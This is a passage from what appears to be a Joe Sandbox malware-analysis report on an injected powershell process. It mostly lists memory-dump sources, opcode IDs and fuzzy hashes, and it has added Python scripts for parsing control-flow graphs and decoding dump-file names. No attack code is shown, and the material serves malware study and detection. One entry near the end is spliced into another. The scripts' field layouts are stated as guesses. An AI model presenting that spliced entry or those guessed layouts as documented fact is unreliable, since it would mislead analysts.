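def parse_cfg(serialized: str) -> Dict[int, Block]:
    """Parse the token stream (layout assumed from the report's own strings) into blocks."""
    toks = serialized.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("expected a control_flow_graph token stream")
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    i = 1
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:                         # edge token: <src>-><dst>
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
            continue
        ident = int(tok)                        # node token: <id> <start>[-<end>] [call <target>]
        lo, _, hi = toks[i + 1].partition("-")
        start = int(lo, 16)
        blk = Block(ident, start, int(hi, 16) if hi else start)
        i += 2
        if i + 1 < len(toks) and toks[i] == "call":
            blk.call = int(toks[i + 1], 16)
            i += 2
        if ident in blocks:
            raise ValueError(f"block {ident} defined twice")
        blocks[ident] = blk
    for src, dst in edges:                      # attach edges only after all nodes are known
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an undefined block")
        blocks[src].succ.append(dst)
    return blocks


def entry_block(blocks: Dict[int, Block]) -> int:
    # Assumption: the function entry is the lowest-address block (true for both graphs here).
    return min(blocks, key=lambda k: blocks[k].start)


def exit_blocks(blocks: Dict[int, Block]) -> Set[int]:
    return {k for k, b in blocks.items() if not b.succ}


def call_targets(blocks: Dict[int, Block]) -> Set[int]:
    return {b.call for b in blocks.values() if b.call is not None}


def reachable(blocks: Dict[int, Block], entry: int) -> Set[int]:
    seen: Set[int] = set()
    stack = [entry]
    while stack:                                # iterative DFS over successor edges
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(blocks[n].succ)
    return seen


def unreachable_blocks(blocks: Dict[int, Block]) -> Set[int]:
    """Blocks the graph lists but never reaches from the entry (none expected for a clean CFG)."""
    return set(blocks) - reachable(blocks, entry_block(blocks))


def summarize(blocks: Dict[int, Block]) -> str:
    lines = []
    for k in sorted(blocks, key=lambda k: blocks[k].start):
        b = blocks[k]
        rng = f"{b.start:x}" if b.start == b.end else f"{b.start:x}-{b.end:x}"
        call = f" call {b.call:x}" if b.call is not None else ""
        succ = ", ".join(map(str, b.succ)) if b.succ else "(exit)"
        lines.append(f"{k}: {rng}{call} -> {succ}")
    return "\n".join(lines)


if __name__ == "__main__":
    for name, text in (("0x3397740", CFG_3397740), ("0x339bad0", CFG_339BAD0)):
        g = parse_cfg(text)
        print(f"function {name}: {len(g)} blocks, entry {entry_block(g)}, exits {sorted(exit_blocks(g))}, "
              f"calls {[hex(t) for t in sorted(call_targets(g))]}, unreachable {sorted(unreachable_blocks(g))}")
        print(summarize(g))
```

Feeding `call_targets` back into the report is the practical use: 0x3397940, 0x3397932, 0x339afa8 and 0x339a790 are the next functions to pull out of the same 0x3390000 dump when following what this code does.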
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0fc4708e62287dc6650a4f90d9926333291b5f626e7b73e31df8d6b3f030e07b
• Instruction ID: 4b7f2b086b32f6a599b2fb13f999a10cea2f9950d21d86e32b99717bfaa9877c
• Opcode Fuzzy Hash: 0fc4708e62287dc6650a4f90d9926333291b5f626e7b73e31df8d6b3f030e07b
• Instruction Fuzzy Hash: ED510574E00248DFDB14DFA9D884A9DFBF5EF88311F19802AE819AB364DB709845CF60
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cbdf48ad5ab9e8e17e84bb8b5b138da419e125890e8f07332c15b3f33a0041b2
• Instruction ID: 7ef13ab7226b45fc9d5ed5001d2d50a609a67982c33698a8fb3ca82509fd1ebc
• Opcode Fuzzy Hash: cbdf48ad5ab9e8e17e84bb8b5b138da419e125890e8f07332c15b3f33a0041b2
• Instruction Fuzzy Hash: F74145F2B0030ACBCB258F64C50166A7BB7AF84348F18C4A9D900CF256C731ED6AC7A1
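Every function in this section is disassembled from a memory dump rather than from a file on disk (`based on PE: false`), and the dump name is the only place the region's metadata appears. The following is an added example, not code from Joe Sandbox: a Python decoder for the `.sdmp` and `.jbxd` names quoted in this report. The field layout it assumes for the `.sdmp` name (process ID, dump pass, sequence number, base address, page protection, an undecoded flags field, memory type, reserved) and for the snapshot name (`hcaresult_<pid>_<pass>_<base>_<process>.jbxd`) is inferred from the visible values, not taken from Joe Sandbox documentation; the `PAGE_*` and `MEM_*` constants are the standard Win32 values. It performs the check an analyst wants before reading the listing: both regions are `MEM_PRIVATE` and `PAGE_EXECUTE_READWRITE` inside process 11 (powershell), so the code was written into the process at run time and has no on-disk backing. The caveat, carried in the code, is that the CLR's JIT also emits into private RWX memory in a .NET host such as powershell.exe, so this attribute says "read the dump", not "injected" on its own.

```python
import re
from dataclasses import dataclass

# Standard Win32 memory constants from winnt.h (facts, not assumptions).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Names quoted from this report.
DUMP_3390000 = "0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp"
SNAP_3390000 = "hcaresult_11_2_3390000_powershell.jbxd"
DUMP_7910000 = "0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp"
SNAP_7910000 = "hcaresult_11_2_7910000_powershell.jbxd"

# ASSUMED layout of the .sdmp name, inferred from the values above and not from Joe Sandbox
# documentation: pid . pass . sequence . base . protect . flags . type . reserved
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<pass>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<reserved>[0-9A-Fa-f]{8})\.sdmp$"
)
# ASSUMED layout of the IDA plugin snapshot name: hcaresult_<pid>_<pass>_<base>_<process>.jbxd
JBXD_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<pass>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd$")


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    dump_pass: int
    base: int
    protect: int
    flags: int       # meaning not known; carried through undecoded
    mem_type: int


@dataclass(frozen=True)
class Snapshot:
    pid: int
    dump_pass: int
    base: int
    process: str


def parse_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a .sdmp name in the assumed layout: {name}")
    return DumpRegion(
        pid=int(m["pid"], 16), dump_pass=int(m["pass"], 16), base=int(m["base"], 16),
        protect=int(m["protect"], 16), flags=int(m["flags"], 16), mem_type=int(m["type"], 16),
    )


def parse_jbxd(name: str) -> Snapshot:
    m = JBXD_RE.match(name)
    if not m:
        raise ValueError(f"not a .jbxd name in the assumed layout: {name}")
    return Snapshot(int(m["pid"]), int(m["pass"]), int(m["base"], 16), m["proc"])


def describe_protection(value: int) -> str:
    """Render a PAGE_* value as its symbolic name plus any modifier bits."""
    base = value & 0xFF
    parts = [PAGE_PROTECTIONS.get(base, f"0x{base:x}")]
    parts += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(parts)


def is_executable(region: DumpRegion) -> bool:
    return (region.protect & 0xFF) in EXECUTABLE


def is_writable(region: DumpRegion) -> bool:
    return (region.protect & 0xFF) in WRITABLE


def needs_dump_review(region: DumpRegion) -> bool:
    """True for code with no on-disk backing: private, writable and executable.
    Unpacked and injected code lives in such regions, but so does the CLR's JIT output,
    so in a .NET host like powershell.exe this is a reason to read the dump, not a verdict."""
    return MEM_TYPES.get(region.mem_type) == "MEM_PRIVATE" and is_executable(region) and is_writable(region)


def cross_check(region: DumpRegion, snap: Snapshot) -> bool:
    """The .sdmp and .jbxd names describe the same region only if PID, pass and base agree."""
    return (region.pid, region.dump_pass, region.base) == (snap.pid, snap.dump_pass, snap.base)


if __name__ == "__main__":
    for dump, snap in ((DUMP_3390000, SNAP_3390000), (DUMP_7910000, SNAP_7910000)):
        r, s = parse_sdmp(dump), parse_jbxd(snap)
        print(f"pid {r.pid} ({s.process}) base 0x{r.base:x} {describe_protection(r.protect)} "
              f"{MEM_TYPES.get(r.mem_type, hex(r.mem_type))} flags=0x{r.flags:x} "
              f"consistent={cross_check(r, s)} review={needs_dump_review(r)}")
```

The 0x800 flags field is deliberately left undecoded; if Joe Sandbox documents it, extend `DumpRegion` rather than guessing.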
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd73be54d4608d9620b957e6c0c5e73ea99944b8166a1f011cf1542579aefa6d
• Instruction ID: 362dc1b9e095f39d5222c79889c455b0b3f85ad2ccad4fc6869f5e63f6e9c1d3
• Opcode Fuzzy Hash: bd73be54d4608d9620b957e6c0c5e73ea99944b8166a1f011cf1542579aefa6d
• Instruction Fuzzy Hash: 6E4107B4A00609DFDB06CF58C4D89AAFBB1FF48310B15859AD915AB365C736EC51CFA0
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbf6287ba675dcdcf4898eb01b229227e93c189ec20b98f0a0d6b2f682a403e9
• Instruction ID: 75031780e9f6e63f40db3e81edf0e273007bf26a21f10aba794ea02ce92ee5a1
• Opcode Fuzzy Hash: dbf6287ba675dcdcf4898eb01b229227e93c189ec20b98f0a0d6b2f682a403e9
• Instruction Fuzzy Hash: B6416D34B14245CFDB15DB68C898AAEBFF1AF8D315F1940AAD442AB392CB35DC41CB61
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9691d913680bbee2eefbdc99f82f8960bb9261c1d21ccf8668bb48baff7d2b2b
• Instruction ID: 3165d4f439d214e40c59b4f7a4e52cb0209908f326bd3df7da70fbe656472cc2
• Opcode Fuzzy Hash: 9691d913680bbee2eefbdc99f82f8960bb9261c1d21ccf8668bb48baff7d2b2b
• Instruction Fuzzy Hash: 2531AE353002119FD705EB78E894B9ABBE6EFD4216F048629E60ACB351DF74AC45CBA1
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb06f3fee0e2c454a918ec829f3ac6265ddcbd3064adb1ffcf2c1e86796ac87d
• Instruction ID: eb4b3d09f143364d4493ef07fab2b48a577e50f05a2c401e531aa5a2f735fb2f
• Opcode Fuzzy Hash: eb06f3fee0e2c454a918ec829f3ac6265ddcbd3064adb1ffcf2c1e86796ac87d
• Instruction Fuzzy Hash: 7B318E74E002098FDB04DFA9C894BAEBBF6EF89300F14812AE506EB350EB709C01CB50
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3474f9891839da81c2e21a72f86377df9ccc7a3b10745e40e052c16d02edf241
• Instruction ID: dbdfa906ca102ba63e06299809dbe5aea12eaff5337845766bd9a037ed25be84
• Opcode Fuzzy Hash: 3474f9891839da81c2e21a72f86377df9ccc7a3b10745e40e052c16d02edf241
• Instruction Fuzzy Hash: 1D31D53590E7D69FDB07DB689CA45DABF70EF57224B0945C3C094CB1A3C6298C0AC762
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 359c772b1607d6ddd5e1e5fa5720f9105dfbc57bfcead0de6fc62a7d2c149de6
• Instruction ID: 10044cb2ea721796c0cbe2e807a6d9effa08fb771e9407a372e0b15791c11585
• Opcode Fuzzy Hash: 359c772b1607d6ddd5e1e5fa5720f9105dfbc57bfcead0de6fc62a7d2c149de6
• Instruction Fuzzy Hash: CC3194B8A003089FDB04EF64D894AAE7BB2EF85301F1184A9D215AF395DA789D41CB91
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1da43d57a7b31a764097431a3e12cfa3b75f28ee34f135017420d294c9d801e5
• Instruction ID: 3e922c78d93ade071d6834f244e03067eda8c2569cebec383854646938a215f9
• Opcode Fuzzy Hash: 1da43d57a7b31a764097431a3e12cfa3b75f28ee34f135017420d294c9d801e5
• Instruction Fuzzy Hash: 0A314B74E002098FDF05DFA9D8947AEBBF6AF89304F15816AE506EB350EA749C018B55
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b8b199ca8773104338c6251bbfb14fcd1263ee72df5f6a10e2f74aa49c38e61c
• Instruction ID: 4600b6be11805be9711a9b5720a97154a025f11674fd1af2ef0d4395804f5fb9
• Opcode Fuzzy Hash: b8b199ca8773104338c6251bbfb14fcd1263ee72df5f6a10e2f74aa49c38e61c
• Instruction Fuzzy Hash: 4A316C34A002048FDB14DF69D498A9DBBF6BF88318F15446AD446EB3A1CF75AC85CB91
Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0869611361dc86426cc1524a4a450152ef3edff1fd23e159307f8c417689b85e
                                                                                                                                                                        • Instruction ID: d9aeeacd38114278e45af0924cc31f7fa3e18a6745aef071b334f5b051bb9672
                                                                                                                                                                        • Opcode Fuzzy Hash: 0869611361dc86426cc1524a4a450152ef3edff1fd23e159307f8c417689b85e
                                                                                                                                                                        • Instruction Fuzzy Hash: BF316B74A002048FCB08DF69D498A9EBBF6FF88318F05446AD406EB391CF75AC85CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 21b440a17e71b5e3eeff9083e78df3561c2158a3c123453b9820c21c0d58bb1c
                                                                                                                                                                        • Instruction ID: aa8a1bfb17f7ce1a10ae3470d7b996bf1212795843fae7808328404307c5b139
                                                                                                                                                                        • Opcode Fuzzy Hash: 21b440a17e71b5e3eeff9083e78df3561c2158a3c123453b9820c21c0d58bb1c
                                                                                                                                                                        • Instruction Fuzzy Hash: C8313CB8E002099FDB04EFA4D894ABEB7B2EF84301F118469D215AF394DA799D418B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 75fb4f810ce1f64afd56f74708e898e8a88e10c158c70e6d53b0939e1f8e1daf
                                                                                                                                                                        • Instruction ID: c59d1dacb1a2edac7b06ba2f134d8264abf06e412623969312d391eaed5c7a29
                                                                                                                                                                        • Opcode Fuzzy Hash: 75fb4f810ce1f64afd56f74708e898e8a88e10c158c70e6d53b0939e1f8e1daf
                                                                                                                                                                        • Instruction Fuzzy Hash: 5131A974905744CEEB64CF6AD48879AFFF6EB88320F28C05ED44D9B246C774A881CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1863952570.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b5a13fa19181583013d16f42893801ed1c312201e44e31baea90cf61dab816b4
                                                                                                                                                                        • Instruction ID: 3d1afc95dac62288542859dc1e9b0cdb7c99d1b4404749337b29f077728208cd
                                                                                                                                                                        • Opcode Fuzzy Hash: b5a13fa19181583013d16f42893801ed1c312201e44e31baea90cf61dab816b4
                                                                                                                                                                        • Instruction Fuzzy Hash: C0212475618300FFCB05CF14DAC0B26BBA5FB88314F24C5ADEA0A0A256C336D496CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1863952570.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 13abfbd4fc244355bace7e00bed71d36df17e4ad55dacef4b243abb221fafb52
                                                                                                                                                                        • Instruction ID: 21c0826754bd11f066b6fd69c1eb35f6df3423aef15fbbde268422ab388c2644
                                                                                                                                                                        • Opcode Fuzzy Hash: 13abfbd4fc244355bace7e00bed71d36df17e4ad55dacef4b243abb221fafb52
                                                                                                                                                                        • Instruction Fuzzy Hash: 9921F575614240EFCB14DF14EAC4B16BBA5EB84325F24C5ADD90B4B34AC376D486CA61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1593b52065fe561703394be307625566a6c66fbeae782e3d3685ad6938b79f5c
                                                                                                                                                                        • Instruction ID: 1103daf0ae10ecd50015978a7462020e063e6ab4a91d91e4fb41f7a7ca8fa72f
                                                                                                                                                                        • Opcode Fuzzy Hash: 1593b52065fe561703394be307625566a6c66fbeae782e3d3685ad6938b79f5c
                                                                                                                                                                        • Instruction Fuzzy Hash: FA218BB4905744CEEB60CF6AC48879AFBF6EF88310F28C45ED85D97205D7746481CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5e9ac94c3bd79fc9edf3da8f7121dbc85ebaff1eb6e61df3d44142e5e0d7a7c7
                                                                                                                                                                        • Instruction ID: 3eeea268c116abc94beaa6718b188891dd38b95f4ed41b97dc0c2367e8366ad9
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e9ac94c3bd79fc9edf3da8f7121dbc85ebaff1eb6e61df3d44142e5e0d7a7c7
                                                                                                                                                                        • Instruction Fuzzy Hash: EB110A797102188FCF04DBA8D8409DE77E6EBCC321B1440A5E909DB350DB35DC518B90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1863952570.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction ID: fe385dfe354bf1c6e8dde8fd19c19e758ec00957559f2bb49ef9646657241962
                                                                                                                                                                        • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction Fuzzy Hash: 91218C76504241EFCB06CF10DAC4B16BF72FB88314F28C5A9DD4A4A656C33AD4AACB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1863952570.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction ID: cc8c0457fc125d1038424cca55e897c7bec65cac439872b436d3298e4fa94763
                                                                                                                                                                        • Opcode Fuzzy Hash: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction Fuzzy Hash: 35118E75504280DFDB15CF14D6C4B15BF61FB84224F28C6A9D84A4B656C33AD48ACB51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6d3881ebba336d8931b9e2367a0c7a3d24bf0f0291da7b1c656cc7ca0275cf32
                                                                                                                                                                        • Instruction ID: e9217944c4c354856a7ba467f7d23bb4b9bc6dbc458270b8bdbe4544639005f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d3881ebba336d8931b9e2367a0c7a3d24bf0f0291da7b1c656cc7ca0275cf32
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A01C4316083449FD718DB75D894A66BFE4EF45210F1884EEE08ACB6A2CA20E845C700
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0f50b2fecdb40755a871170c9a723c8866ecc7edf04eaafe36da5eb6f989f4e0
                                                                                                                                                                        • Instruction ID: 753d4eddfe02ed27e1b9304446a4b97c69177bf2a7e09f63bf7ceb92ecaef6ac
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f50b2fecdb40755a871170c9a723c8866ecc7edf04eaafe36da5eb6f989f4e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 64F04975110A40AFD321CF06CD84D63BBB9EFC5620B198499A84A4B312C671FC42CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c8b69ac3098ab6347db58c1f69a9d0b30666456c0b81370f401194431689385c
                                                                                                                                                                        • Instruction ID: 94fbd974149f5cee731328711609242e69cefea9f5cd00bc7e8b23edf22c0ad1
                                                                                                                                                                        • Opcode Fuzzy Hash: c8b69ac3098ab6347db58c1f69a9d0b30666456c0b81370f401194431689385c
                                                                                                                                                                        • Instruction Fuzzy Hash: 99F01D705043444FD765DB78D8AD796BFA8EB01314F0558AED24ACB292DB746881CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c8dc780aaab519358aec6ce9ad503a17bc4ed749ac5ac7e5da379a02b2cbe223
                                                                                                                                                                        • Instruction ID: efd7720050d2dc4f09473669cf9937e12ddea99db0f444941ac64eca85d16bd1
                                                                                                                                                                        • Opcode Fuzzy Hash: c8dc780aaab519358aec6ce9ad503a17bc4ed749ac5ac7e5da379a02b2cbe223
                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0E2797002044BE714EF64C0543AB77A6DFC2729F10812ECA094B385CE7D6842CBE2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a5cdbd529c286e2900bf3459cba9c60df43de568c518086c5d7d58bcfc9d0a08
                                                                                                                                                                        • Instruction ID: f4e4006db3d68e2373d2e7962da6be28cfb7c262a32aa9527959dd8cbeba4a0b
                                                                                                                                                                        • Opcode Fuzzy Hash: a5cdbd529c286e2900bf3459cba9c60df43de568c518086c5d7d58bcfc9d0a08
                                                                                                                                                                        • Instruction Fuzzy Hash: 4BF0A0397102148FDF10DB6DD840A9ABBE6EBCC7527194199E909CB350DF24CC028B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
